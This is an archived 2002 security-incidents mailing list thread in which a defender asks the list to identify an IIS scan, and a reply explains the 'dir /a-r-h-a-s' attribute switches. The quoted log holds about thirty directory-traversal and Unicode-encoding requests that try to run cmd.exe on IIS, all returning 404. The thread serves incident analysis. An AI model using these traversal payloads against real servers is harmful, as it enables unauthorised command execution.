Security Incidents mailing list archives
Re: Arhas?
From: "Patrick Nolan" <pnolan01 () nycap rr com>
Date: Fri, 1 Mar 2002 12:01:24 -0500
HTH, Pat http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/winxppro/proddocs/attrib.asp Attrib Displays, sets, or removes the read-only, archive, system, and hidden attributes assigned to files or directories. Used without parameters, attrib displays attributes of all files in the current directory. Syntax attrib [{+r|-r}] [{+a|-a}] [{+s|-s}] [{+h|-h}] [[Drive:][Path] FileName] [/s[/d]] Parameters +r Sets the read-only file attribute. -r Clears the read-only file attribute. +a Sets the archive file attribute. -a Clears the archive file attribute. +s Sets the system file attribute. -s Clears the system file attribute. +h Sets the hidden file attribute. -h ----- Original Message ----- From: "K M" <kmoon01 () hotmail com> To: <incidents () securityfocus org> Sent: Friday, March 01, 2002 10:56 AM Subject: Arhas? Hi, Does anybody recognize the IIS scan below? A google search on the string "a-r-h-a-s" turns up a brief report on the incidents.org intrusions list, but no identification. TIA, K get /scripts/..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /scripts/..á../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /scripts/..à%9v../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /scripts/..à%qf../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /scripts/..á%8s../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /scripts/..á%pc../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /scripts/..o../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /scripts/..ð??¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /scripts/..ø???¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /scripts/..ü????¯../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /iisadmpwd/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /cgi-bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /samples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /_vti_cnf/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /adsamples/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 get /winnt/system32/cmd.exe /c+dir/a-r-h-a-s 404 http/1.0 _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Arhas? K M (Mar 01)
- RE: Arhas? Starbuck Newton (Mar 01)
- Re: Arhas? Patrick Nolan (Mar 01)
- <Possible follow-ups>
- Re: Arhas? K M (Mar 01)